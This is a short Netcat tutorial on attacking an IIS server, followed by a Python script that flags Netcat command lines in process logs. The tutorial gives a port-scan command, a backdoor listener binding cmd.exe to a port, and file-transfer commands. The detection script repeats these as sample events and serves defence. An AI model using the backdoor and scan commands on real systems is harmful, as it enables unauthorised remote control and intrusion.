NetCat – The "Swiss Army Knife"
Port scanning with Netcat
A scanning example from Hobbit is "nc -v -w 2 -z target 20-30".
Netcat as a BackDoor
So now we have Netcat uploaded to the IIS server, we want to use it to create a
backdoor, in order to get a remote command prompt.
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS
server (let's choose port 10001) and then we can connect to this port from our
attacking machine...using Netcat of course!
The command we want to give on the server looks like this:
nc -L -p 10001 -d -e cmd.exe
Transferring files using Netcat
Let's look at other possibilities Netcat can provide. Say we wanted to transfer a file
called hack.txt to the IIS server, and for some reason we don't want to TFTP the file.
We can use Netcat to transfer files from one system to another.
To receive a file named hack.txt on the destination system start Netcat on the IIS
server with the following command:
nc -l -p 1234 >hack.txt
Then, on the source system, send the file to that listener:
nc destination 1234 <hack.txt
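From the defender's side, the three uses above (scan, listener bound to a program, file-transfer listener) all show up in process-creation logs as Netcat command lines. The following is an added example, not part of the original post: it classifies command lines by the flags shown on this page. The sample events, the C:\temp path, and the severity labels are constructed assumptions.

```python
import shlex

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
TAKES_ARG = set("epwgGsio")  # options followed by a value in traditional netcat
BEHAVIOUR = {"l": "listener", "L": "listener", "e": "exec", "d": "detached", "z": "scan"}

def classify(cmdline):
    """Return the behaviours seen in a netcat command line, or None if not netcat."""
    tokens = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    if not tokens:
        return None
    image = tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    if image not in NETCAT_NAMES:
        return None
    found = set()
    for tok in tokens[1:]:
        # Only short options are handled; long (--option) forms are skipped.
        if not tok.startswith("-") or tok.startswith("--"):
            continue
        for ch in tok[1:]:          # walk clustered flags such as -lvp
            if ch in BEHAVIOUR:
                found.add(BEHAVIOUR[ch])
            if ch in TAKES_ARG:     # rest of the token is the option's value
                break
    return found

def severity(found):
    """Map behaviours to a triage level (labels are an assumption of this example)."""
    if found is None:
        return None
    if {"listener", "exec"} <= found:
        return "high"      # listening port wired to a program: remote shell
    if found & {"listener", "exec", "scan"}:
        return "medium"
    return "low"           # netcat ran, e.g. as a plain client

# Constructed process-creation command lines (not taken from a real host).
SAMPLE_EVENTS = [
    r'"C:\temp\nc.exe" -L -p 10001 -d -e cmd.exe',
    "nc -v -w 2 -z target 20-30",
    "nc -l -p 1234",
    "nc destination 1234",
    r"C:\Windows\System32\notepad.exe -e notes.txt",
]

def triage(events):
    """Return (severity, command line) for every netcat event."""
    return [(severity(classify(e)), e) for e in events if classify(e) is not None]

if __name__ == "__main__":
    for level, cmd in triage(SAMPLE_EVENTS):
        print(f"{level:6} {cmd}")
```

Matching on the image name misses a renamed binary, so this check works best alongside file-hash and listening-port telemetry.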